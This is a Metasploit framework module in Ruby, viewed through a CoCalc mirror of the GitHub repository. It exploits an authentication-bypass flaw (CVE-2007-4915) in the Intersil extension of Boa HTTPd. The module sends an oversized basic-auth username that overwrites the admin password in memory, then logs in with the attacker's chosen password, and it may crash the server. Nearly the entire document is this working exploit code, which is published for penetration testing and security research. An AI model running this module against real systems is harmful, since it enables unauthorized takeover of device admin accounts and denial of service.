Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/intersil_pass_reset.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
14
'Description' => %q{
15
The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
16
allows basic authentication bypass when the user string is greater
17
than 127 bytes long. The long string causes the password to be
18
overwritten in memory, which enables the attacker to reset the
19
password. In addition, the malicious attempt also may cause a
20
denial-of-service condition.
21
22
Please note that you must set the request URI to the directory that
23
requires basic authentication in order to work properly.
24
},
25
'Author' => [
26
'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
27
'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
28
'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
29
],
30
'License' => MSF_LICENSE,
31
'References' => [
32
[ 'CVE', '2007-4915' ],
33
[ 'BID', '25676'],
34
[ 'PACKETSTORM', '59347']
35
],
36
'DisclosureDate' => '2007-09-10',
37
'Notes' => {
38
'Stability' => [CRASH_SERVICE_DOWN],
39
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
40
'Reliability' => []
41
}
42
)
43
)
44
45
register_options(
46
[
47
OptString.new('TARGETURI', [ true, 'The request URI', '/']),
48
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
49
]
50
)
51
end
52
53
def check
54
res = send_request_cgi({
55
'uri' => '/',
56
'method' => 'GET'
57
})
58
59
if res && (m = res.headers['Server'].match(%r{Boa/(.*)}))
60
vprint_status("Boa Version Detected: #{m[1]}")
61
return Exploit::CheckCode::Safe if (m[1][0].ord - 48 > 0) # boa server wrong version
62
return Exploit::CheckCode::Safe if (m[1][3].ord - 48 > 4)
63
64
return Exploit::CheckCode::Vulnerable
65
end
66
67
return Exploit::CheckCode::Safe('Not a Boa Server!')
68
rescue Rex::ConnectionRefused
69
print_error('Connection refused by server.')
70
return Exploit::CheckCode::Safe
71
end
72
73
def run
74
return if check != Exploit::CheckCode::Vulnerable
75
76
uri = normalize_uri(target_uri.path)
77
uri << '/' if uri[-1, 1] != '/'
78
79
res = send_request_cgi({
80
'uri' => uri,
81
'method' => 'GET',
82
'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), datastore['PASSWORD'])
83
})
84
85
if res.nil?
86
print_error('The server may be down')
87
return
88
end
89
90
if res.code != 401
91
print_status("#{uri} does not have basic authentication enabled")
92
return
93
end
94
95
print_status('Server still operational. Checking to see if password has been overwritten')
96
res = send_request_cgi({
97
'uri' => uri,
98
'method' => 'GET',
99
'authorization' => basic_auth('admin', datastore['PASSWORD'])
100
})
101
102
if !res
103
print_error('Server timed out, will not continue')
104
return
105
end
106
107
case res.code
108
when 200
109
print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
110
when 401
111
print_error('Access forbidden. The password reset attempt did not work')
112
else
113
print_status("Unexpected response: Code #{res.code} encountered")
114
end
115
end
116
end
117
118